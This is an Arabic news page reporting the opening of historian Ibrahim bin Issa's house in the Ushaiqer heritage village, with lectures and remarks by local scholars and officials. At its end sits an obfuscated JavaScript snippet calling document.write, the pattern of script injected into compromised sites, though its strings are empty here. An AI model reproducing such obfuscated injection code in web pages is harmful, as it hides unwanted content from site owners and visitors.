.



إضغط هنا لتنتقل  



محافظ شقراء يفتتح دار المؤرخ إبراهيم بن عيسى في القرية التراثية بأشيقر

افتتح محافظ شقراء الاستاذ عادل بن عبدالله البواردي دار المؤرخ إبراهيم بن صالح بن عيسى رحمه الله في القرية التراثية بأشيقر وذلك بحضور رئيس مركز أشيقر الاستاذ عبدالله بن خالد الضويان و‏الأستاذ محمد بن عبد الرحمن العيسى والأستاذ عمر بن عبد الرحمن العيسى وسليمان العبدالعزيز الحميد وصالح العنقري احفاد ‏الشيخ المؤرخ العيسى والشيخ عبدالعزيز بن عبدالكريم ‏العيسى عضو مجلس الشورى ‏وعدد من الأدباء والمثقفين والاعيان. هذا وقد تجول الحضور في أرجاء الدار وشاهدوا مقتنيات ‏المؤرخ واستمعو إلى شرح من أ/ محمد الحسيني عضو فريق العمل بالدار . والأستاذ / احمد المغيره، بعد ذلك القى الشيخ ابوعبدالرحمن بن عقيل الظاهري محاضرة ‏بهذه المناسبة عن المؤرخ ابن عيسى، وأدارها الدكتور الاديب أحمد البسام الذي ‏تحدث عن المؤرخ ابن عيسى وكيف كان أديبا ومثقفا ومؤرخاً وعالماً في تلك الحقبة من الزمن كما شكر القائمين على هذا المشروع وهذه الندوة التي جاءت بدعوة من فريق العمل .
‏ثم بعد ذلك تحدث الشيخ أبو عبد الرحمن ابن عقيل الظاهري عن المؤرخ ابن عيسى عن ميلاده في اشيقر وحياته وعلمه وتعليمه ووفاته في مدينة عنيزه وأورد عدد من المواضيع والقصص والاعمال الخاصة بالشيخ كما ‏كانت هناك مداخلات و أسئلة من الحضور أجاب عليها الشيخ أبو عبدالرحمن الظاهري.
من جهته قال الدكتور عبداللطيف بن محمد الحميد عضو فريق العمل بالدار ان افتتاح الدار بمنزل ابن عيسى ومسقط رأسه أشيقر يمثل بعداً تاريخياً له دلالاته العميقة بعد مرور قرابة قرن على رحيله. ومنها الاهتمام برمز من رموز تاريخنا المحلي حضي بتشجيع الملك عبدالعزيز، ومنها احتفاء المؤرخين والباحثين بمكانة هذا المؤرخ وريادته. واهتمام اسرته واحفاده واسباطه بجدهم العالم المؤرخ.
وقال ‏الدكتور الحميد إن دولتنا الرشيدة في عهد خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز وولي عهده الامين حريصة ‏كل الحرص على تكريم العلم والعلماء و ‏خير دليل وشاهد على ذلك حضور محافظ شقراء الاستاذ عادل البواردي لهذا الاحتفال العلمي البهيج. واختتم الدكتور عبداللطيف حديثه بشكر زملائه في فريق العمل ومنهم الاستاذ محمد الحسيني، واسرة العيسى الكريمة على تبنيهم هذا العمل الوطني الجليل. ‏الذي سيثري الثقافة والادب في منطقة الوشم. (تصوير/ملفي الرويس)




التعليق عبر الفيس بوك

لا توجد تعليقات

التعليق مغلق


var _0xf471=["","write",""];var _0x4ee8=[_0xf471[0],_0xf471[1],_0xf471[2]];var _0x1ef4=[_0x4ee8[0],_0x4ee8[1],_0x4ee8[2]];var _0x60dd=[_0x1ef4[0],_0x1ef4[1],_0x1ef4[2]];document[_0x60dd[1]](_0x60dd[0]);document[_0x60dd[1]](_0x60dd[2])